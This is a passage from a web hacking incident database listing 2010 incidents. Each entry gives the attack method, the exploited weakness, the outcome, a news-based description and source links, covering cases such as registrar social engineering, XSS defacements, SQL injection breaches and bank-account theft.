Incident Description: The attack, which took place overnight, saw a message from the Iranian Cyber Army appear on the Baidu home page. It featured a picture of the Iranian flag, and a message written in Farsi. Here’s how Baidu alleges the hacker got access to one of the world’s most popular web sites domain name account in under an hour: 1. Hacker starts online chat session with Register.com representative, claiming to be an agent of Baidu. 2. Register.com representative asks hacker to provide verification information. Hacker provides invalid information, but Register.com goes ahead and e-mails a security code to the email address it has on file for Baidu anyway. 3. The hacker doesn’t have access to that e-mail address, so he/she relays a bogus security code to the Register.com representative via chat. Baidu claims the representative didn’t bother to compare the code to the actual one. 4. Hacker asks Register.com representative to change email address on file to antiwahabi2008@gmail.com, and representative does. 5. Hacker now uses “forgot password” link at Register.com to request the username and password to the account. Hacker can then log in and change the name servers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.telegraph.co.uk/technology/news/6974129/Baidu-hacked-by-Iranian-Cyber-Army.html
Attack Source Geography: Iran
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://domainnamewire.com/2010/02/24/how-baidu-got-hacked-by-the-iranian-cyber-army/
Entry Title: WHID 2010-43: Sleuths Trace Digital Clues to Predict iPad Sales
WHID ID: 2010-43
Date Occured: 3/19/2010
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Entropy
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: To get the ball rolling on the iPad estimate, Mr. Tello asked participants on a private message board for Apple watchers, AAPL Sanity, to share the order number that the Apple Store assigns to each online purchase and includes on the order's email confirmation. The first order submitted, from a user named Joe, had an eight-digit order number 68,715,XXX (the last three digits have been excised) at 8:30 a.m. Eastern time on March 12, the first day iPad orders could be placed. Another order placed five days later, by a user named Israel, was numbered 68,937,XXX. That is a difference of about 222,000.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://online.wsj.com/article/SB10001424052748704207504575130351672451186.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-42: Frenchman Arrested After Hacking Into Obama's Twitter Accounts
WHID ID: 2010-42
Date Occured: 3/25/2010
Attack Method: Brute Force
Application Weakness: Insufficient Password Recovery
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: A Frenchman will face trial after hacking into Twitter accounts, including that of U.S President Barack Obama, a French prosecutor said. The 24-year-old man from central France was arrested on Tuesday and could face up to two years in prison in France for fraudulent access to a computer system. The arrest followed a joint operation between the Federal Bureau of Investigation and the French police, according to French state prosecutor Jean-Yves Coquillat. The man, whose name hasn't been release, is charged with having hacked into the Twitter Inc. social-networking accounts of famous people. He did this in April 2009 after posing as a site administrator, said Mr. Coquillat. As well as Mr. Obama's account, he hacked into that of singer Britney Spears, he said.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://online.wsj.com/article/SB10001424052748704094104575143391819054502.html
Attack Source Geography: France
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link: http://techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/
Entry Title: WHID 2010-41: NineMSN compromised
WHID ID: 2010-41
Date Occured: 2/17/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Internet
Attacked Entity Geography: Australia
Incident Description: Microsoft's Ninemsn, one of the most visited portals in Australia (Alexa rank 573), was compromised and injected with malicious code. The malicious code was identified to be part of the Gumblar mass injections.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.itwire.com/business-it-news/security/36912-ninemsn-compromised
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-40: TCS Website Hacked, Domain Name Up For Sale
WHID ID: 2010-40
Date Occured: 2/8/2010
Attack Method: DNS Hijacking
Application Weakness: Insufficient Process Validation
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography: India
Incident Description: Indian software giant Tata Consultancy Services Ltd. (TCS) has witnessed the hijacking of its official website www.tcs.com. The hackers not only attacked the website but also allegedly changed its domain name and put it up for sale!
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.techtree.com/India/News/TCS_Website_Hacked_Domain_Name_Up_For_Sale/551-109190-643.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-39: Tesda Website hacked again; users directed to Smartmatic
WHID ID: 2010-39
Date Occured: 1/11/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Phillipines
Incident Description: Even before its administrators could fix the problem, the website of the Technical Education and Skills Development Authority was hacked again early Monday, this time redirecting visitors to the website of Smartmatic, the contractor tasked to implement the automated elections this May. A check of the hacked TESDA website's homepage showed the hackers left instructions for the site to redirect to Smartmatic's website in 20 seconds.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.gmanews.tv/story/181244/tesda-website-hacked-again-users-redirected-to-smartmatic
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-38: Cross-Site Scripting through Flash in Gmail Based Services
WHID ID: 2010-38
Date Occured: 3/22/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Leakage of Information
Attacked Entity Field: Information Services
Attacked Entity Geography:
Incident Description: IBM Security Researcher outlines the XSS vuln he found that exploits a Flash upload file movie by passing Javascript within external parameters.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.watchfire.com/wfblog/2010/03/cross-site-scripting-through-flash-in-gmail-based-services.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-37: ING Shareholder Data Exposed on Website
WHID ID: 2010-37
Date Occured: 1/25/2010
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography:
Incident Description: On January 25, an ING customer discovered that she could access client information on the ingfunds.com web site and notified her stockbroker. In investigating the situation, ING discovered that since August 2008, a file containing the names, addresses, Social Security numbers, and account numbers of 106 ING shareholders had been available on the web through a search engine. The company notified the New Hampshire Attorney General on February 3 that 17 residents of the state were affected.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://doj.nh.gov/consumer/pdf/ing.pdf
Attack Source Geography: New Hampshire, USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-36: Durex condom orders leak on web – customer (update 1)
WHID ID: 2010-36
Date Occured: 3/22/2010
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: India
Incident Description: Last week, this site received a lead about a security problem involving the web site of a Durex product. On March 5, a customer reportedly discovered that anyone could view his and other customers’ orders on the kohinoorpassion.com web site by simply inserting a different order ID number in the url without any login required. Names, addresses, phone numbers, and type of products ordered were all there for ready viewing.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.databreaches.net/?p=10726
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-35: CISO Witnesses Hack Like No Other
WHID ID: 2010-35
Date Occured: 3/3/2010
Attack Method: Content Spoofing
Application Weakness: Insufficient Anti-automation
Outcome: Loss of Sales
Attacked Entity Field: Government
Attacked Entity Geography: PA, USA
Incident Description: Here's what Maley told attendees to an RSA Conference panel on state cybersecurity on Wednesday: "We saw thousands of hits on our Department of Transportation driver license exam scheduling site coming out of Russia, the same thing over and over, scheduling driver license exams. It was encrypted traffic, and we were trying to figure out what the heck is going on. Were they trying to test our systems? What exactly were they up to? The answer was, we really didn't know." Authorities eventually discovered that the hacker who used a proxy server in Russia to mask his identity owned a driving school in Philadelphia, and exploited a vulnerability in the driving test scheduling system to allow the scheduling of more tests than the allotted time slots. It could take upward of six weeks to schedule a driving test in Philadelphia. Said Maley: "What he was doing was saying (to potential customers), "You go over across the street, to John's driver training, and it's going to take you six to eight weeks to get your test. We can get you in tomorrow."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.bankinfosecurity.com/posts.php?postID=469
Attack Source Geography: PA, USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-34: Over 120 000 Sanoma User Credentials Stolen
WHID ID: 2010-34
Date Occured: 3/23/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Entertainment
Attacked Entity Geography: Finland
Incident Description: Not exactly a startup news per se, but a healthy reminder to all those working with user credentials in their online services. One of the largest, if not the largest, online identity thefts has just occured in Finland. The service to be breached was Älypää, a Sanoma bought gaming site. The sad part is that while an identity breach of this magnitude is always bad – this has been made worse by Sanoma actually storing the passwords in plain text, making them usable anywhere.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.arcticstartup.com/2010/03/23/over-120-000-sanoma-user-credentials-stolen/?ref=rc
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-33: N.Y. Firm Faces Bankruptcy from $164,000 E-Banking Loss
WHID ID: 2010-33
Date Occured: 2/15/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: NY, USA
Incident Description: A New York marketing firm that as recently as two weeks ago was preparing to be acquired now is facing bankruptcy from a computer virus infection that cost the company more than $164,000. Immediately before the fraud occurred, Mrs. McCarthy found that her Windows PC would no longer boot, and that the computer complained it could not find vital operating system files. “She was using it one day and then this blue screen of death just came on her screen,” said a longtime friend who was helping McCarthy triage her computer. Later, McCarthy’s friend would confirm that her system had been infected with the ZeuS Trojan, a potent family of malware that steals passwords and lets cyber thieves control the infected host from afar. ZeuS also includes a feature called “kill operating system,” which criminals have used in prior bank heists to effectively keep the victim offline and buy themselves time to make off with the cash. Karen McCarthy said TDBank has dug in its heels and is now saying it has no responsibility for the loss.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.krebsonsecurity.com/2010/02/n-y-firm-faces-bankruptcy-from-164000-e-banking-loss/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-32: Crooks Crank Up Volume of E-Banking Attacks
WHID ID: 2010-32
Date Occured: 2/23/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: Ohio, USA
Incident Description: Computer crooks stole more than $200,000 from an auto body shop in Ohio last month in a brazen online robbery. The attack is yet another example of how thieves are using malicious software to bypass bank security technologies that are often touted as strong deterrents to this type of fraud. Story outlines Banking Trojan types of activity which intercepted the one-time passcode and then redirected the real user to a fake maintenance page.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.krebsonsecurity.com/2010/03/crooks-crank-up-volume-of-e-banking-attacks/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-31: Organized Crooks Hit Ark. Utility
WHID ID: 2010-31
Date Occured: 3/4/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: Arkansas, USA
Incident Description: In a separate incident on March 4, organized crooks stole roughly $130,000 from North Garland County Regional Water District, a public, nonprofit utility in Hot Springs, Ark. Again, thieves somehow broke into the utility’s online bank account and set up unauthorized transfers to more than a dozen individuals around the country that were not affiliated with the district. Manager Bill Reinhardt said the district is still investigating how the thieves gained access to its accounts, and that it had notified the FBI about the breach. Reinhardt said the district has so far worked with its bank to reverse about half of the fraudulent transfers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.krebsonsecurity.com/2010/03/organized-crooks-hit-nj-town-arizona-utility/#more-1918
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-30: Organized Crooks Hit NJ Town
WHID ID: 2010-30
Date Occured: 3/19/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: New Jersey, USA
Incident Description: The Federal Bureau of Investigation and the Atlantic County Prosecutor's Office are helping Egg Harbor Township police investigate what township police said was an "outside intrusion into a municipal banking account"that was to blame for missing municipal funds." In a statement, the township police also warned the public that computer criminals have become more sophisticated. "Emails can appear to originate from your bank, or other legitimate location, and when opened can cause great financial damage," the department wrote. "Use extra care with your email and where you may send/enter any personal information."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.pressofatlanticcity.com/news/top_three/article_35e425d8-32f2-11df-a24f-001cc4c03286.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://www.krebsonsecurity.com/2010/03/organized-crooks-hit-nj-town-arizona-utility/
Entry Title: WHID 2010-29: Conservatives embarrassed as hackers exploit loophole on anti-union website
WHID ID: 2010-29
Date Occured: 3/23/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: United Kingdom
Incident Description: It was hoped that visitors to the website - http://cash-gordon.com – would use popular social networking websites such as Twitter and Facebook to spread the word about Gordon Brown’s union links. One of its features displayed any message posted on Twitter if it included the term “#cashgordon”, no matter what else it said. By writing Twitter messages containing the “#cashgordon” and their own piece of web code, they were able to redirect visitors to any other site on the internet. Anyone who tried to access the Cash Gordon website for more than an hour was sent elsewhere, such as to the Labour Party’s site or to hardcore pornography pages.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.telegraph.co.uk/technology/twitter/7499228/Conservatives-embarrassed-as-hackers-exploit-loophole-on-anti-union-website.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-28: Bank sues victim of $800,000 cybertheft
WHID ID: 2010-28
Date Occured: 1/26/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: TX, USA
Incident Description: A Texas bank is suing a customer hit by an $800,000 cybertheft incident in a case that could test the extent to which customers should be held responsible for protecting their online accounts from compromises. The incident, which was first reported by blogger Brian Krebs this week, involves Lubbock-based PlainsCapital bank and its customer Hillary Machinery Inc. of Plano. In November, unknown attackers based in Romania and Italy initiated a series of unauthorized wire transfers from Hillary's bank accounts and depleted it by $801,495. About $600,000 of the amount was later recovered by PlainsCapital.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.computerworld.com/s/article/9149218/Bank_sues_victim_of_800_000_cybertheft
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-27: Poughkeepsie, N.Y., slams bank for $378,000 online theft
WHID ID: 2010-27
Date Occured: 2/8/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: NY, USA
Incident Description: The theft of $378,000 from the town of Poughkeepsie, N.Y., is prompting questions about the responsibility of banks to protect customer accounts from online criminals. In a statement last week, a Poughkeepsie town official revealed that thieves had broken into the town's TD Bank NA account and transferred $378,000 to accounts in the Ukraine.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.computerworld.com/s/article/9153598/Poughkeepsie_N.Y._slams_bank_for_378_000_online_theft
Attack Source Geography: Ukraine
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-26: Russia Arrests Alleged Mastermind of RBS WorldPay Hack
WHID ID: 2010-26
Date Occured:
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: Georgia, USA
Incident Description: A fascinating story about a group of hackers who broke into the RBS WorldPay DBs through SQL Injection. Russian authorities have nabbed the man accused of masterminding a coordinated global ATM heist of $9.5 million from Atlanta-based card processing company RBS WorldPay. The hackers compromised RBS WorldPay’s database encryption to raise the amount of funds available on the compromised cards, and boost their daily withdrawal limits. In some case, the hackers raised the limits to $500,000. According to the indictment, Tsurikov conducted reconnaissance of the RBS network after Covelin provided him with information about vulnerabilities in the system. Pleshchuk and Covelin then worked on exploiting the vulnerabilities to obtain access. Pleschuk allegedly developed the method for reverse engineering the encrypted PINs. Once the hackers raised the account limits, they provided an army of cashers with 44 cards programmed with the account details. On November 8 that year, the cashers simultaneously hit more than 2,000 ATMs, netting about $9.5 million in less than 12 hours. The story did not specify the exact vulnerabilities exploited to manipulate the DB however the Indictment PDF (in the reference) lists actual SQL commands sent to the DBs (pages 10-11). If you then cross-reference this story with WHID entry 2009-51 where the Romania Hacker Unu released SQL Injection vulns in RBS WorldPay web applications, it seems most plausible that these Russian Hackers used similar vulnerabilities.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.wired.com/threatlevel/2010/03/alleged-rbs-hacker-arrested
Attack Source Geography: Russia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://www.wired.com/images_blogs/threatlevel/2009/11/rbs-worldpay-indictment.pdf
Entry Title: WHID 2010-25: Flawed Security Exposes Vital Software to Hackers
WHID ID: 2010-25
Date Occured: 3/5/2010
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Technology
Attacked Entity Geography:
Incident Description: McAfee, a leading maker of Internet security software, warned this week that software systems used by many companies to store and manage their intellectual property are being actively targeted by hackers and are in need of significantly increased security focus. McAfee took issue with Perforce’s implementation of access controls. For instance, using the Web interface, someone who manages to access one user account could access those of other users by manipulating the associated URL, or Web address, it said. Perforce responded that, if customers choose the systems most restrictive mode, that situation isn’t possible.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://bits.blogs.nytimes.com/2010/03/05/flawed-security-exposes-vital-software-to-hackers/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://graphics8.nytimes.com/packages/pdf/technology/20100306Aurora.pdf
Entry Title: WHID 2010-24: Singapore's biggest forum, Hardwarezone Forums, gets hacked (friendly)
WHID ID: 2010-24
Date Occured: 3/18/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Retail
Attacked Entity Geography: Singapore
Incident Description: Yesterday, at 8pm past, a member "gameboyz" discovered pretty quickly that he could inject HTML code into the Tag Board Chat, and posted a script which changed the contents of the page where the tagboard would appear, with a message below, when one accessed certain sections of the site.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://asia.cnet.com/blogs/rehashplus/post.htm?id=63017848&scid=hm_bl
Entry Title: WHID 2010-23: Beware: Malware Attacks Facebook, B-Ball & Gossip Sites
WHID ID: 2010-23
Date Occured: 3/19/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography:
Incident Description: At a time when college basketball fans are going wild, cybercriminals are actively pursuing opportunities for scams. Basketball fans go online to fill out bracket selections, and when they do, hackers are also playing their own game of spamdexing, i.e. manipulating search results to promote sites, according to James Duldulao, a security researcher at McAfee. In this case, he explained, cybercriminals are spamdexing malware-infected sites. This week, the top results for terms like "ncaa bracket" and "march madness predictions" were poisoned. McAfee reports that five out of the first 10 hot searches on Google Trends are being promoted by a network Relevant Products/Services of legitimate sites that were hacked to serve malware. One site had an embedded Flash file that downloads malware from another site and installs it without user interaction Relevant Products/Services.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.toptechnews.com/story.xhtml?story_id=11000CA733W8&full_skip=1
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-22: Hackers target SDP leaders
WHID ID: 2010-22
Date Occured: 3/21/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: Finland
Incident Description: At least two leading figures in the opposition Social Democratic Party were attacked by computer hackers during the weekend. On Sunday, the web pages of the party’s Parliamentary group chairman Eero Heinäluoma were hacked, and on Saturday evening it was the turn of the party’s chairwoman Jutta Urpilainen. Strange pictures and text had appeared on Heinäluoma’s page www.heinaluoma.net on Sunday, and shortly before 4 p.m. his web page was no longer accessible. On Saturday evening, Urpilainen’s page had been targeted with obscene messages and child pornography. The pages crashed at about 10:00 p.m.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.hs.fi/english/article/Hackers+target+SDP+leaders+/1135254873196
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-21: Wiseguys Tickets charged with hacking into Ticketmaster, LiveNation to illegally grab best seats
WHID ID: 2010-21
Date Occured: 3/1/2010
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Loss of Sales
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: This entry is related to WHID 2008-48 (http://www.xiom.com/whid-2008-48) however it expands beyond only TicketMaster to include LiveNation. Prosecutors said the men hired a hacker in Bulgaria to program a way around the "CAPTCHA" technology that requires ticket buyers to read and retype two distorted random words to prove they are people, not a computer program. In a spectacular irony, the defendents managed to take a process meant to distinguish between a human and a machine - and automate it. The indictment said they even programmed their bots to make mistakes so they would appear to be human ticket buyers. When the bots swarmed a Web site, they were able to fill out the CAPTCHA fields in a twinkling, beating any real human buyers. Read more: http://www.nydailynews.com/news/ny_crime/2010/03/01/2010-03-01_wiseguys_tickets_charged_with_hacking_into_ticketmaster_livenation_to_illegally_.html?page=1#ixzz0iumX65AV
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.nydailynews.com/news/ny_crime/2010/03/01/2010-03-01_wiseguys_tickets_charged_with_hacking_into_ticketmaster_livenation_to_illegally_.html
Attack Source Geography: Bulgaria
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-20: Jewish Community Assistance Group Website Hacked
WHID ID: 2010-20
Date Occured: 3/21/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Religious
Attacked Entity Geography: Israel
Incident Description: The internet website of the Keren Kehilot organization was hacked Sunday morning by a gang of Muslim hackers, apparently from Turkey.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.israelnationalnews.com/News/Flash.aspx/182976
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-19: Hacked personal data originating from China
WHID ID: 2010-19
Date Occured: 3/22/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: Korea
Incident Description: According to police, Chinese hackers have been targeting Web sites of Korean department stores and other frequently visited sites. The hackers offer the Korean information for sale on the Internet. Last September, a used-car trading Web site and the Internet home page for a car navigation manufacturer were victims of Chinese hackers who stole names and residential registration numbers of 910,000 online members. Hackers can use the stolen registration numbers to become members of certain Web sites that send spam messages, or sell the numbers to other hackers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://joongangdaily.joins.com/article/view.asp?aid=2918142
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-18: Hackers crash Aussie charity websites
WHID ID: 2010-18
Date Occured: 3/22/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Health
Attacked Entity Geography: Australia
Incident Description: The internet services of two Australian autism support organisations have been crashed by computer hackers and a third may also have fallen victim, raising fears of a targeted attack to coincide with autism month. Austism Spectrum Australia (ASPECT), the country's autism service provider, is losing hundreds of dollars in online donations each day after its website was hit by hackers early on Sunday.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.stuff.co.nz/technology/3486923/Hackers-crash-Aussie-charity-websites
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-17: Govt websites hacked
WHID ID: 2010-17
Date Occured: 3/20/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Bangladesh, India
Incident Description: Bangladesh government websites, operating out of the Prime Minister's Office, were attacked on Saturday by hackers purporting to be "Indian" . bdnews24.com, at around 2.30am, found that 19 out of 64 district web portals had been hacked by "MIL INDIAN HACKER", threatening "cyber war" in retaliation to any terrorist attack by Pakistan on Indian soil "via Bangladesh". Most of the sites were fixed around 16 hours later, said officials, who in some cases had first been notified of the cyber attack by bdnews24.com's online report. The hacked portals displayed a poster on opening, which said: 28 DIFFERENT STATES, 28 DIFFERENT LANGUAGES BUT ONE WORD JAI HIND!'
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://bdnews24.com/details.php?id=156315&cid=2
Attack Source Geography: India
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-16: The Game's Email Hacked, Monthly Expenses List Leaked
WHID ID: 2010-16
Date Occured: 3/22/2010
Attack Method: Brute Force
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: Hackers don't discriminate. The biggest targets these days seem to be celebrities. The latest is rapper The Game, whose GMAIL account was reportedly hacked into recently. According to TheBoomBox.com, the rapper didn't have too many interesting things going on in his email. At least, nothing revealed just yet. The only thing of interest leaked was a detailed list of his monthly expenses, which total roughly $52,000.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.ballerstatus.com/2010/03/22/the-games-email-hacked-monthly-expense-list-leaked/
Attack Source Geography:
Attacked System Technology: GMail
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-15: Villar website 'hacked'
WHID ID: 2010-15
Date Occured: 3/19/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: Phillipines
Incident Description: The rivalry between Senators Manny Villar and Benigno "Noynoy" Aquino has gone beyond the campaign trail as the official website of the Nacionalista Party presidential bet supposedly got hacked by an Aquino supporter Monday. At about 10 a.m., Villar's official website www.mannyvillar.co.ph contained a blog entry titled "Hacked by Kris Aquino." The entry, which was written in "swardspeak", took jabs at Villar's marketing strategy and ended up coaxing its readers to vote for Aquino instead.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.abs-cbnnews.com/lifestyle/03/22/10/villar-website-hacked
Attack Source Geography: Phillipines
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-14: Dismantling of Saudi-CIA Web site illustrates need for clearer cyberwar policies
WHID ID: 2010-14
Date Occured: 3/19/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: Saudi Arabia
Incident Description: A very interesting cyberwarfare story involving US government/military on both sides. By early 2008, top U.S. military officials had become convinced that extremists planning attacks on American forces in Iraq were making use of a Web site set up by the Saudi government and the CIA to uncover terrorist plots in the kingdom. Elite U.S. military computer specialists, over the objections of the CIA, mounted a cyberattack that dismantled the online forum.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.washingtonpost.com/wp-dyn/content/article/2010/03/18/AR2010031805464.html
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-13: Australian Government websites blitzed by DDoS attack
WHID ID: 2010-13
Date Occured: 2/10/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Politics
Attacked Entity Geography: Australia
Incident Description: The websites of Senator Stephen Conroy and the Australian Parliament House were inaccessible this morning after the 'Anonymous' group of hackers claimed credit for a Distributed Denial of Service (DDoS) attack on Australian Government web sites.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.securecomputing.net.au/News/166860,australian-government-websites-blitzed-by-ddos-attack.aspx
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-12: Army Website Compromised Through SQL Injection
WHID ID: 2010-12
Date Occured: 1/9/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: A Romanian grey hat hacker has disclosed an SQL inject (SQLi) vulnerability on a website belonging to the United States Army, which leads to full database compromise. The website, called Army Housing OneStop, is used to provide information about military housing facilities to soldiers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Army-Website-Compromised-Through-SQL-Injection-131649.shtml
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-11: U.S. Military Equipment Website Hacked
WHID ID: 2010-11
Date Occured: 1/13/2010
Attack Method: SQL Injection
